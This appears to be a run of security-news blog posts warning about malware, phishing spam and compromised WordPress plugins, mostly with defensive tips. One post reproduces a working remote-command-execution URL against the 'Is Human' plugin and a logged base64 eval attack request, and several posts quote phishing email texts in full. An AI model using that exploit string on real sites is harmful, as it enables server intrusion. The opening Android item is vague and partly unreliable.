Super Malware that Attacks Android Discovered

Android and security threats go almost hand in hand as new and imminent threats are discovered on almost a weekly basis in today’s market. However, there was no threat that could potentially uproot Google’s Android as one of the most popular mobile operating systems in the world. But all that is set to change now, as a new virus has been detected that is very advanced and attacks the Android operating system in a new and innovative way. Also, the code is a little hard to completely remove, and can potentially detract users from using Android in the future.

Deadly Characteristics of the Virus

When a security researcher performs an assessment of any malicious software, he or she considers the most dangerous traits of that malicious software. From that viewpoint, this is one of the most dangerous Android malware discovered. Firstly, the code is so complex that it looks almost like a code that is written for a Windows computer, or even more advanced. The code also uses obfuscation techniques to confuse the OS about its true nature, thus evading detection. But the most dangerous trait of this malware is that it has been programmed to resist attempts of uninstallation by the user.

Kaspersky Labs behind the Discovery

Kaspersky, a leading security products company, detected this malware in Android and said that is has the capability of single handedly bringing down the Android operating system. They also reported that this malware exploits vulnerabilities in the Android OS that were previously, quite literally unknown.

References:
Android super-malware discovered – Is Google's platform in peril ...

virusfreephone.com/.../android-super-malware-discovered-is-googles-pla...‎

View shared post

4 days ago – Android super-malware discovered – Is Google's platform in peril? ... Android Mobile Attacks Spreading Across The Globe, McAfee Finds ›.

Android super-malware discovered – Is Google's platform in ..

malware.rsspump.com/?...android-super-malware-discovered--is...‎

View shared post

4 days ago – Android super-malware discovered – Is Google's platform in peril? ... and anti- malware software in light of the recent malicious attacks across  ...

Security Flaw Found in Facebook Pages Manager App for Android

Facebook Patches Privacy Flaw In Pages Manager For Android ...

Over the weekend, Android Police received a tip about a serious privacy hole in Facebook Pages Manager for Android that made some privately uploaded photos public.   Shortly after  the details of this  issue went  public, Facebook Security got in touch ... a fix had been rolled out server-side, and noapp update was necessary.

 

Serious Privacy Flaw In Facebook Pages Manager ... - Android Police
www.androidpolice.com/.../serious-privacy-flaw-in-facebook-pages-man...‎

2 days ago – Update 5/26/13 11:30pm PT: Rory from Facebook Security has informed .... Facebook Pages Manager App Updated To 1.4 With Photo Albums, ...

Privacy Flaw Found in Facebook Pages Manager ... - Softpedia News
news.softpedia.com › News › Telecoms › Mobile Blog‎

1 day ago – Privacy Flaw Found in Facebook Pages Manager for Android. ... Facebook Messenger and Facebook Apps Updated on Android · Oppo Find 5 ...

Flaw in Facebook Pages Manager for Android makes your private messages public
http://tech2.in.com/news/android/flaw-in-facebook-pages-manager-for-android-makes-your-private-messages-public/874420

If you have Facebook’s Pages Manager application installed onto your Android devices to access your pages at any time of the day, you need to beware. If you plan on sending an image as a private message to a fan of your page, chances are that the image will get posted onto your wall for all your fans to see.

 

Microsoft Issues Worldwide Virus Alert

The talk and the footprint of computer viruses in the online world had reduced significantly in the last year. Hackers and online miscreants had moved on to other methods of attacking computers as viruses were considered to be too weak. But Microsoft recently announced that the trend is all set to change in the coming days. A security expert from the IT giant said that hackers were reverting back to the usage of viruses and coming up with innovative attack vectors. He said that this year, the world will witness a significant increase in the usage of viruses for attacking computers (both personal and corporate).

Low Broadband Penetration Rate

Tim Rains, the security expert who announced the news, said that Microsoft was monitoring the virus trends on the World Wide Web and noticed a spike in the volume of viruses for the first time. He said that low broadband penetration rate has increased the chances of a computer getting infected with any of the malicious software, including Trojans and worms. He said that this trend is being exploited by hackers and they are using viruses more actively to infect broadband connected computers (which is almost every internet enabled computer today). Microsoft also added that they had traced the infections to as far as Egypt, Pakistan, and Bangladesh.

Viruses Are Easy to Eliminate

Rains said that even today, viruses are very easy to be removed as their signatures can be easily detected and tracked. He said that users are expected to keep their anti-virus systems updated which will significantly reduce the chances of being attacked by a virus.

[via NBC News ]

Malware Threat to ATMs

Malware has been a big threat to computers and there have been a lot of problems caused by this type of malicious software. As if that was not enough, a forensics and security threat firm has announced a threat that malware can be used to target ATMs. Group-IB, the firm that announced these findings, said that malware can be used to collect data from the ATMs or swiping machines, and hack into the bank accounts. According to the study, the malware stores the data and sends it to the hacker who planted the malware whenever a network connection is available for transmission.

A Few Researchers Disagree

While Group-IB discussed their findings, the Director of Research at the University of Alabama, Gary Warner, said that malware cannot be used in the way Group-IB is announcing. He said that ATM networks are secured at multiple levels and something as simple as malware cannot get through the layers of encryption and firewalls. Typically, malware tries to exploit the weaknesses in the security that protects a system.

Bank Networks Vulnerable from Inside

Warner added that banks don’t have to worry about the attacks from the outside. He said that banks should worry more about someone from the inside planting malicious software into the bank networks as that is where the vulnerability is at its highest. He said that an auto load malware can be inserted as easily as plugging in a USB drive into the computer.The jury is still out on whether malware can affect banks from the outside or not, but the question is how severe the repercussions will be in case malware does attack a bank network.

[via Bank Info Security]

Malware Distributed from Phony SourceForge Website

Make sure you double-check the URL in your browser’s address bar or dialog window before downloading files online.

Zscaler researchers discovered that cybercriminals were taking advantage of the trusted reputation of SourceForget[.net] by distributing malware through a similar domain, sourceforgetchile.net.

The malicious file analyzed by Zscaler, minecraft_1.3.2.exe, was posing as a file associated with the popular game, Minecraft as the name suggests.

In reality, the executable file was a piece of malware closely related to the ZeroAccess Trojan that, upon a successful infection, will hide in the Recycle bin, inject malicious code into running processes, recruit the computer into a botnet, and generate revenue for its operators by part-taking in click fraud.

Thankfully this threat has a high detection rate (32/46), according to a VirusTotal report. So in the event that you downloaded the Trojan, you can perform a full system scan using one of the many AV programs capable of finding & removing it.

Aside from that, stay vigilant & always double-check the URL before clicking 'Download'.

[via Zscaler]

Texas Plant Explosion Spam Leads to Malware Attack

Considering cybercriminals jumped on the opportunity to spread malware by sending spam related to Monday’s Boston marathon bombing, it’s not all that surprising that they’re now doing the same with yesterday’s fertilizer plant explosion in West, Texas.

Here are some of the subject lines to watch out for:

• West TX Explosion


• Waco Explosion HD


• Texas Plant Explosion


• Texas Explosion Injures Dozens


• CAUGHT ON CAMERA: Fertilizer Plant Explosion Near Waco, Texas


• Raw: Texas Explosion Injures Dozens

Like the marathon-themed emails, the spam messages tied to the new fertilizer plant explosion trick users into following malicious links by promising video footage of the devastating event.

Image Credit: Sophos

While it’s true that the victim is presented with a series of embedded videos related to the incident, they are also being exposed to the misdeeds of the Redkit exploit kit, which will use Adobe PDF or Java vulnerabilities to silently install malware on the victim’s computer.

Avoiding these attacks should be relatively easy – don’t follow links in unsolicited emails. Aside from that, keeping your operating system (& installed software) up-to-date and running antivirus software should help your PC remain malware-free.

Have you received any suspicious emails related to the plant explosion or marathon bombing? Share your experiences below and get the word out to help protect others!

[via Sophos][via AppRiver]

Don’t miss out on the latest tech news and computer security alerts! Follow us on Twitter at @hyphenet,  “Like” us on Facebook or add us to your circle on Google+

Spammers Exploit Boston Marathon Bombing to Spread Malware

Click with caution if you receive unsolicited emails or find yourself wanting to click a website link related to the deadly bombing attack at the Boston Marathon on Monday.

Antivirus firms Avira and Sophos, along with email security provider AppRiver have already intercepted emails from spammers aspiring to dupe users into following malicious links by offering links to video footage of the attacks.

There are a variety of domain names and subject lines associated with this spam campaign; some of the subject lines in use are:

• Explosion[s] at Boston Marathon


• Boston Explosion Caught on Video


• Aftermath to explosion at Boston Marathon


• Video of Explosion at the Boston Marathon 2013


• Runner captures. Marathon Explosions


• 2 Explosions at the Boston Marathon

The body of the email appears to contain nothing more than a link pointing to a website that has legitimate videos from the attack. However, that same site is rigged with malicious code that will attempt to exploit Java plugin vulnerabilities in order to drop a backdoor Trojan on your machine.

Avira identifies the threat as TR/Crypt.ZPACK.Gen, while Sophos identifies it as Troj/Tepfer-Q.

Upon a successful infection, TR/Crypt.ZPACk.Gen (or Troj/Tepfer-Q) will modify the system registry and connect to a remote server, granting an attacker remote access to the affected PC.

Tips to Keep Your PC Safe

Avira warns that malicious links may also be posted on Facebook, so users should also exercise caution when following links shared on social networks. Here are a few other bits of advice to help keep your computer malware-free:

• Do not click links or download files attached to unsolicited emails.


• Stick to the official websites of your favorite news channel to get the latest updates.


• Keep your operating system and installed third-party software fully patched and up-to-date.


• Always run antivirus software and keep the virus definitions current.

Did You Already Fall for It?

Both Avira and Sophos offer security products capable of detecting and removing the malware being spread by these online attacks. So if you have the sinking feeling that you may have followed a bad link, you may want to try performing a full system scan using one of their products.

Don’t miss out on the latest tech news and computer security alerts! Follow us on Twitter at @hyphenet,  “Like” us on Facebook or add us to your circle on Google+

American Airlines Spam Spreads Backdoor Trojan

Webroot is cautioning users not to fall for spam emails posing as a notification from American Airlines stating that their ticket is all set and ready for download.

This spam campaign isn’t exactly new, although previous versions may have had malicious files attached directly to the email itself.

Here’s what the current variant looks like:

 

American Airlines

Customer Notification

Your bought ticket is attached to the letter as a scan document.

To use your ticket you should Download It.

The embedded link will prompt users to download an executable, “Electronic Ticket.exe” that only 10/46 antivirus will identify as malware.

Dr. Web antivirus detects the threat as BackDoor.Kuluoz.4. Once it has infected your system, BackDoor.Kuluoz.4 will modify system files, inject itself into system processes and connect to a list of command & control servers.

Did You Get this Spam Email?

If you received a copy of this spam email, it is advised that you:

• Do not click on any links within the email.


• Do not download any files that may be attached or linked from this email.


• Forward a copy of the email, including the header to webmaster@aa.com.


• Delete the email immediately.

If You Downloaded Any Files...

If you made the mistake of clicking the link or opening any files attached to spam emails resembling the one above, you are advised to perform a full system scan using an antivirus solution offered by one of the following vendors:

• Dr. Web


• Sophos


• Kaspersky

Their products are capable of detecting and removing the threat associated with this attack. Be sure to be more careful in the future!

Don’t miss out on the latest tech news and computer security alerts! Follow us on Twitter at @hyphenet,  “Like” us on Facebook or add us to your circle on Google+

Check Your WordPress Plugins: Social Media Widget Found to be Injecting Spam into Websites

WordPress website masters are being advised to update (or remove) the Social Media Widget plugin following the discovery that it was being misused to inject spam into websites it was installed on.

According to Sucuri Security, the malicious code that calls the URL, hxxp://i.aaur.net/i.php to inject “Pay Day Loan” spam links on the affected website was added to version 4.0 of the plugin, which was launched about 2 weeks ago.

A thread on plugin’s support forums reveals that the compromise was a result of the owner trusting the wrong developer.

The Social Media Widget plugin was removed from the WordPress Plugin repository after it was found to have been tampered with, but has since been reinstated following removal of the bad code in version 4.0.1.

However, the plugin is quite popular, and there’s no telling how many of the 900k websites it had already been installed upon were still at risk.

If you have the Social Media Widget plugin installed on your WordPress website, it is strongly advised that you:

• Update or remove the plugin immediately.


• Run your site through Sucuri’s SiteCheck scanner (free) to verify that your website is clean.

Don’t miss out on the latest tech news and computer security alerts! Follow us on Twitter at @hyphenet,  “Like” us on Facebook or add us to your circle on Google+

Watch Out for Fake HP Printer Scan Emails

Keep an eye out for fraudulent emails claiming that a document was scanned and sent to you from your office Hewletter-Packard ScanJet printer.

Sophos warns that spammers are once again sending out bogus scan-to-email notices in an attempt to dupe users into clicking malicious links that lead to websites serving malware.

Subject: Fwd: Re: Scan from a Hewlett-Packard ScanJet #1788378

A document was scanned and sent to you using a Hewlett-Packard HP9289197

Sent to you by: PEARLIE
Pages: 3
Filetype(s): Images (.jpeg) View

This isn’t the first time that spammers mimicked document-to-file scan notifications, but previous attempts involved malicious file attachments vs. links in the email itself.

The malware served in the attack was not disclosed; however, the websites associated with this attack are rigged with the BlackHole exploit kit, which typically leverages PDF, Flash & Java vulnerabilities in order to plant malware on the visiting machine.

So, keep your computer safe by:

• Not following links embedded in unsolicited emails – at least not without investigating them first.


• Running antivirus software that offers real-time scanning & keep the virus definitions current. (Btw, Sophos blocks the page as Mal/ExpJS-N.).


• Keeping your operating system and third-party software fully patched & up-to-date.

If you’ve already clicked the link, run a full system scan to detect & remove any potential malware that may have been installed on your computer.

Don’t miss out on the latest tech news and computer security alerts! Follow us on Twitter at @hyphenet,  “Like” us on Facebook or add us to your circle on Google+

Spyware Uses Fake Facebook Page to Steal Credit Card Data

It’s time to scan your computer for malware if you try to visit Facebook.com and land on a "security check" page requesting that you enter your credit card information to “verify your account.”

Spyware that TrendMicro researchers identify as TSPY_MINOCDO.A tricks unsuspecting users into disclosing their financial information by redirecting them to a spoofed Facebook security check page every time they attempt to visit the social networking site.

The redirect is done through the infected machine’s HOST file, and prevents the user from accessing any legitimate Facebook pages until the malware is removed.

Please complete a security check

Security checks help keep Facebook trustworthy and free of spam.

Use a credit card to verify your account

To keep Facebook a safe environment and to make sure that you are using your real name, we require you to confirm your identity by submitting your credit card information.

- This information will only be used to verify your identity.
- Your credit card will not be charged in any way.
- We do not store any credit card information on our servers.
- Please enter the following information to be able to continue using your Facebook account.

Information submitted through the false Facebook page is sent back to the cybercriminals to use as they please.

Aside from stealing payment information, researchers say that TSPY_MINOCDO.A modifies the system registry to ensure it starts every time Windows does, performs DNS queries to multiple domains to ensure that it can report back to its command server, and monitors all browsing activity.

TSPY_MINOCDO.A is distributed via drive-by-download attacks and other malware, so users can protect their computers by:

• Keeping their operating system and installed software fully patched and up-to-date.


• Always running antivirus software and keeping the virus definitions current.


• Exercising caution when following hyperlinks (do a little research first!).


• Disabling Java in their browser if it is not needed (the Java browser plugin is often targeted in cyberattacks).

Above all else, trust your instincts and don’t hand out your credit card information to “verify” your account on a FREE social networking website.

Don’t miss out on the latest tech news and computer security alerts! Follow us on Twitter at @hyphenet,  “Like” us on Facebook or add us to your circle on Google+

Malware Steals Credit Card Data from POS Systems & ATMs

Several hundred POS terminals and ATMs in the United States have been infected by malware designed to steal debit and credit card data, according to security firm Group-IB.

The malware, named “Dump Memory Grabber” is written in C++ without the use of any additional libraries and is capable of collecting Track 1 and Track 2 card data (full name, account number, expiration date, etc.) from infected systems – providing fraudsters all the information they need to create physical card clones.

Upon infection, Dump Memory Grabber modifies the system registry to ensure it runs whenever the affected machine boots, lists all running processes and proceeds to search memory for sensitive payment information. The stolen data is then uploaded via FTP to a remote server believed to be controlled by Russian cybercriminals affiliated with a “big cyber-crime gang.”

The malware is said to have siphoned data associated with debit and credit cards issued by major U.S. banks like Chase, Capital One, Citibank and Union Bank of California.

Group-IB told Security Week that it appears the malware infected most of the POS terminals and ATMs were infected with the help of insiders, such as employees with physical access to the machine or authorization to update system software.  Only a handful of systems running Windows XP or Windows Embedded appeared to be compromised remotely.  Attackers were also able to exploit vulnerabilities in the banks’ network to plant the malware in some cases.

Group-IB has shared its findings on Dump Memory Grabber with VISA, the affected banks and law enforcement.

[via Security Week]

Don’t miss out on the latest tech news and computer security alerts! Follow us on Twitter at @hyphenet,  “Like” us on Facebook or add us to your circle on Google+

Trojan Poses as Flash Player 11 Update, Changes Browser Home Page

Be sure to refer to Adobe’s official website if you’re looking to update Flash Player to the latest version.

There’s a Trojan parading around as a Flash Player 11 update, waiting for the opportunity to sneak onto your computer and change your browser’s home page.

Trojan:Win32/Preflayer.A does its best to trick the unsuspecting end-user by arriving under the name ‘FlashPlayer.exe’ and displaying the following installer window when executed:

 

While it's not entirely clear why two two languages are used (Turkish/English), the agreement being displayed sans scrollbar makes sense since there's a disclaimer at the bottom stating that your browser homepage will be changed to one of the following upon installation:

• www.anasayfada.net


• www.heydex.com

“These sites appear to be a type of search engine, but there are pop-up advertisements displayed on the pages, and there was an instance where I was redirected to a different page not of my choosing.” Jonathan San Jose revealed on Microsoft’s TechNet Blog.

Thankfully, driving traffic to these websites appears to be the main goal. Once the user continues the installation, the fake installer downloads and executes a legitimate Flash Installer and changes the home page in Firefox, Chrome, Internet Explorer and Yandex, as promised.

Microsoft has already received over 70,000 reports of this malware in the last week, but given that it is posing as a fake Flash Update, avoiding it should be relatively easy.

• Only download Flash Updates from adobe.com, and not some random website.


• Pay attention when installing software, and cancel the installer if anything seems amiss (like the missing scrollbar).

Is Your Computer Infected?

To remove Trojan:Win32/Preflayer.A from your computer, perform a full system scan using antivirus provided by one of the following vendors:

• Microsoft 


• McAfee


• AVG


• Ikarus

Just keep in mind that additional steps may need to be taken to change your home page in Internet Explorer.

Don’t miss out on the latest tech news and computer security alerts! Follow us on Twitter at @hyphenet,  “Like” us on Facebook or add us to your circle on Google+.

Malware Uses Evernote as Command & Control Server

TrendMicro researchers have recently stumbled upon a piece of malware that uses the popular note-taking service, Evernote as its command and control server.

The malware, which TrendMicro detects as BKDR_VERNOT.A is classified as a backdoor, and grants an attacker remote access to an infected system to do as they please.

“The sample we gathered consists of an executable file, which drops a .DLL file and injects it into a legitimate process,” Threat Response Engineer, Nikko Tamana  explained on the TrendMicro blog, “The said .DLL file performs the actual backdoor routines.”

Aside from downloading and executing additional files, those backdoor routines include collecting information about the infected system, such as the OS, timezone, user name, computer name, registered owner and organization.

TrendMicro researchers found that commands were retrieved from the notes saved in an Evernote account, which is also suspected to be the location where the stolen data is unloaded.

This is not the first time that malware authors have abused a legitimate service to relay information and evade detection. Twitter and Google Docs are two other services that have been used by malware in the past.

Keeping Your System Safe

BKDR_VERNOT.A is spread via drive-by-download and other malware, so users can minimize their chances of infection by:

• Keeping their operating system and installed third-party software fully patched and up-to-date.


• Running antivirus software with the latest virus definitions.


• Exercising caution when following suspicious hyperlinks (even if they appear to be harmless image links).


• Scanning email file attachments before downloading and/or opening them.

Don’t miss out on the latest tech news and computer security alerts! Follow us on Twitter at @hyphenet,  “Like” us on Facebook or add us to your circle on Google+.

Yontoo Trojan Installs Adware Browser Plugins to Inject Ads in Webpages

Russian antivirus vendor Dr. Web is warning OS X users about a new Trojan, detected as Trojan.Yontoo.1 (“Yontoo”) that installs adware browser plugins on whatever computer it manages to infect.

Users are often duped into downloading Yontoo after landing on a movie trailer page that prompts them to download & install a [missing] browser plugin, media player, video quality enhancement program or download accelerator.

When launched, Yontoo will display a dialog window  to the victim asking them to install a program called “Free Twit Tube” –

 

However, Yontoo proceeds to download and install adware plugins for Safari, Chrome and Firefox instead.  As users surf the web, the plugins relay browsing data to a remote server, which then returns a file that enables the Trojan to inject ads (via third-party code) into webpages loaded in the affected browser.

So, for example, when a user visits apple.com on an infected machine, they may see something like this:

 

While Dr. Web’s write-up focuses on the attack targeting OS X users, it is important to note that Windows users are also subject to Yontoo infections, although Symantec classifies Yontoo as a “potentially unwanted app” vs. Trojan (an app that claims to be one thing when it’s another).

Either way, the ol’ “missing plugin” bit is rather old, so don’t fall for it. Be careful what you install on your computer, and always read the installation dialogs.

Removing Yontoo from Your PC

If you’ve already been tagged by the Yontoo Trojan, you can perform a full system scan using one of the following antivirus programs to remove the infection:

• OS X users:
  
  
  
  • Dr. Web
  
  
  • Intego (detects it as OSX/Tonyoo)
  
  
  
  


• Windows users:
  
  
  
  • Symantec
  
  
  • Webroot
  
  
  
  

Don’t miss out on the latest tech news and computer security alerts! Follow us on Twitter at @hyphenet,  “Like” us on Facebook or add us to your circle on Google+.

Old "Is Human" WordPress Plugin Still on Cybercriminals' Hit List

Just because something isn’t readily available anymore doesn’t necessarily mean that someone isn’t out there searching for it.

Take the “Is Human” WordPress plugin, for example.

It’s no longer available for download, no longer supported by its developers, and yet cybercriminals are still scanning websites hoping that someone still has it installed.

Why? Because versions 1.4.2 and earlier suffer from a remote command execution vulnerability. Below is a write-up from the corresponding exploit-db entry:

The vulnerability exists in /is-human/engine.php.

It is possible to take control of the eval() function via the 'type' parameter, when the 'action' is set to log-reset. From here we can run out own code.

In order to avoid any errors we point the $is_hum->get_* array variable into $is_hum->get_ih and to close the execution without error we point it to php stored function error_log(). In between we may place our own php code and use the passthru() function to execute commands.

Execution running the linux whoami command:

http://server/wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();passthru(whoami);error

We recently experienced attempts to exploit said vulnerability on our website, all of which failed because we don't use this plugin - not to mention they used the incorrect filepath. All attempts originated from the same (U.S.-based) IP address:

/blog/2013/02/01/hackers-still-scanning-for-vulnerable-timthumb-scripts/wp-content/plugins/is-human/engine.php?action=log-reset&error&eval(base64_decode(JHM9cGhwX3VuYW1lKCk7Cm
VjaG8gJzxicj4nLiRzOwoKZWNobyAnPGJyPic7CnBh
c3N0aHJ1KGlkKTsK))&type=ih_options()

The  base64_ decoded text is:

$s=php_uname();
echo '<br>'.$s;

echo '<br>';
passthru(id);

Obviously this post serves as a warning to anyone that may still have this plugin installed on their WordPress website. Cybercriminals will attempt to exploit any vulnerability – old or new – to cause mischief and mayhem.

WordPress is a popular CMS, and it’s important that anyone running it keeps the platform and any installed plugins up-to-date.

Don’t miss out on the latest tech news and computer security alerts! Follow us on Twitter at @hyphenet,  “Like” us on Facebook or add us to your circle on Google+.

Watch Out for Mobile Adware Posing as Candy Crush Saga Apps

Think twice before you download apps that claim to offer cheats or guidance for the popular matching game, Candy Crush Saga.

TrendMicro warns that ill-willed developers have started cashing in on the game's popularity by creating fake Candy Crush apps containing the code for the Leadbolt & AirPush ad networks.

AirPush and Leadbolt have gained quite a poor reputation for their “aggressive marketing practices,” which include placing ads to the notification/status bar, placing ad-enabled search icons on your mobile desk, and collecting user information.

Infact, these ad networks (and a few others) have become such a nuisance that developers & mobile security app vendors have released apps capable of detecting their presence so users can determine which apps are displaying ads on their device (and need to be removed).

TrendMicro’s mobile security app detects the AirPush & Leadbolt ad networks as ANDROIDOS_AIRPUSH.HRXV and ANDROIDOS_LEADBLT.HRY, respectively.

How to Avoid Candy Crush Saga-Themed Adware

As a fan of Candy Crush Saga, I can tell you that a large part of the game relies on luck, so those “cheats” and guides won’t be of much use since the candies aren’t laid out in a specific pattern.  You’ll have to figure it out on your own.

Aside from that, you can gauge the safety of an app by:

• Check the number of downloads and the app’s rating.


• Reading user reviews – usually users will spill the beans on what’s really going on with an app.


• Do a little homework on the developer – i.e. Google their name and make sure there aren’t any red flags in the results.


• Review the app permissions – sometimes the permissions can be hard to gauge (as some legitimate apps require odd permissions), but other times they can throw a big red flag. Either way, look them over and listen to your gut if something seems off.

Don’t miss out on the latest tech news and computer security alerts! Follow us on Twitter at @hyphenet,  “Like” us on Facebook or add us to your circle on Google+.

Experian Spam Used to Spread Data-Stealing Trojan

Don’t open any files attached to emails purporting to be from Experian, claiming that a “key change” has been posted to “one of your three national credit reports.”

Spammers are pumping out Experian phishing emails in an attempt to infect as many computers as possible with malware.

Below is a copy of the email to watch out for:

From: Experian
Subject: IMPORTANT – A Key Change Has Been Posted

Experian

Membership ID #932823422

A Key Change Has Been Posted to One of Your Credit Reports

A key change has been posted to one of your three national Credit Reports. Each day we monitor your Experian, Equifax, and TransUnion Credit Reports for key changes that may help you detect potential credit fraud or identity theft. Even if you know what caused your Report to change, you don’t know how it will affect your credit, so we urge you to do the following:

• View detailed report by opening the attachment.


• You will be prompted to open (view) the file or save (download) it to your computer.


• For best results, save the file first, then open it in a Web browser.


• Contact our Customer Care Center with any additional questions.

Note: The attached file contains personal data.

Your Experian.com membership gives you the confidence you need to look after your credit. We encourage you to log-in regularly to take full advantage of the benefits your membership has to offer, such as unlimited access to your Credit Report and Score Tracker. Notifications like this are an important part of your membership, and in helping you stay on top of your credit.

*If it has been less than thirty days since you joined Experian.com, your monthly credit statement includes your information for the period of time you have been enrolled.

© 2013 Consumerinfo.com, Inc.

The danger of this email lies within the attached file, Credit_Report_XXXXXXXXX.zip which contains an .exe file with the same name and a misleading PDF icon. A virus total scan of the exe reveals that it is actually PWS:Win32/Fareit, and not a credit report as the email suggests (big surprise there).

Did You Receive This Email?

If this email lands in your inbox, be sure that you:

• Do not download or open any attached files.


• Report the email to SpamCop.


• Delete the email immediately.

Did You Already Open the Attached File?

According to Virus Total, 29/46 antivirus programs are capable of detecting the threat associated with this spam campaign, so double-check the VT results and make sure your antivirus can catch it.  Then, do a full system scan and remove any detected threats.

[via DataProtectionCenter.com]

Don’t miss out on the latest tech news and computer security alerts! Follow us on Twitter at @hyphenet,  “Like” us on Facebook or add us to your circle on Google+.

Spam: Surprise! That 40% Apple Discount Coupon is Actually ZeuS Banking Malware

If you get an email offering a coupon to get 40% off Apple products – don’t open the file attached!

Spammers have been sending out emails with bogus coupons that can allegedly be used to shave 40% off the cost of a shiny new iMac, Macbook, or whatever other Apple product the recipient chooses to use it on.

Unfortunately, the only thing enclosed in the file attached to the email, Apple coupon.zip is a copy of the ZeuS Trojan, which will cost the victim money - not help save it - since it steals banking information.

Here's the email to watch out for:

From: Apple Inc.
Subject: You are the one!

One out of thousand!

Only 1000 people have been chosenas winners and you turned out to be one of them!

We?d like to offer you a 40% discount coupon for any Apple production (it?s attached to this email). You can buy a MacBook, iPod, iPhone or anything else Apple products you want! All you need to do is print it out and present at the checkout.
So, next time you go to BestBuy, Circuit City or Apple Store you are able to save up to 40% of any purchase of Apple production.

The discount coupon is accepted in Circuit City, Apple Store ot BestBuy

All the rules and detailed information about the lottery are also can be found in the attachments to this email.

Congratulations!

Did You Get This Email?

If you get an email like the one above, it is recommended that you:

• Do not download or open any files attached to it.


• Report the email to SpamCop.


• Delete the email immediately.

[via Barracuda]

Don’t miss out on the latest tech news and computer security alerts! Follow us on Twitter at @hyphenet,  “Like” us on Facebook or add us to your circle on Google+.

BBB “Your Accreditation Terminated” Spam Spreads Cridex Worm

Spammers are extorting the Better Business Bureau brand in a new spam campaign focused on infecting computers with the Cridex worm.

The spam messages do their best to entice users to click the embedded hyperlinks by claiming that their BBB accreditation has been terminated due to consumer complaints. However, recipients should be able to tell that the email is a fake since it is riddled with mindless grammar & spelling mistakes. ("Beaureau"? Really?)

Below are two variants that are currently circulating:

Your Accreditation Terminated

The Better Business Bureau has been temporary Terminated Your Accreditation
A number of latest complaints on you / your company motivated us to transitory Abort your accreditation with Better Business Beaureau. The information about the our decision are available for review at a link below. Please pay attention to this question and let us know about your mind as soon as possible.

We kindly ask you to visit the SUSPENSION REPORT to respond on this claim

We are looking forward to your prompt response.

If you think you got this email by mistake – please forward this message to your principal or accountant

Faithfully yours

Dispute Consultant
Better Business Bureau

 

Dear Owner:

Your accreditation with [COMPANY] was Terminated

A number of latest complaints on you/ your company motivated us to transient Abort your accreditation with Better Business Beaureau. The details of the our decision are available at the link below. Please give attention to this problem and notify us about your mind as soon as possible.

We pleasantly ask you to overview the ABORT REPORT to reply on this situation.

If you think you received this email by mistake – please forward this message to your principal or accountant

We are looking forward to your prompt reaction.

Looking for info on additional ways your BBB Accreditation can boost your business? Visit the BBB SmartGuide.

Sincerely,
– Online Communication Specialist
bbb.org – Start With Trust

Users that make the mistake of following one of the links in the emails shown above will be directed to a third-party website hosting the infamous BlackHole exploit kit, which will attempt to take advantage of system vulnerabilities in order to drop Worm: Win32/Cridex.E on the visiting machine.

Upon infection, Cridex will modify the system registry to ensure it executes whenever Windows starts, inject itself into a variety of running processes, connect to a remote server to provide an attacker remote control, and copy itself to any removable drives attached to the affected system.

Keep Your PC Safe!

Given that this threat requires user-interaction, avoiding it should be relatively simple.

• Manually type in the URL of the website you wish to visit instead of clicking links in emails, especially if they are unsolicited.


• Do not download or open any files attached to unsolicited emails (or at least be sure to scan them first).


• Always keep your operating system and installed third-party software patched and up-to-date.


• Always run antivirus software that offers real-time scanning and keep the virus definitions current.

Too Late?

Did you already click the link in an email similar to the ones above?

Hopefully you’re running one of the 19 antivirus programs capable of detecting the Cridex worm, because you’re going to need to perform a system scan to detect and remove the infection. Hop to it!

[via Webroot]

Don’t miss out on the latest tech news and computer security alerts! Follow us on Twitter at @hyphenet,  “Like” us on Facebook or add us to your circle on Google+.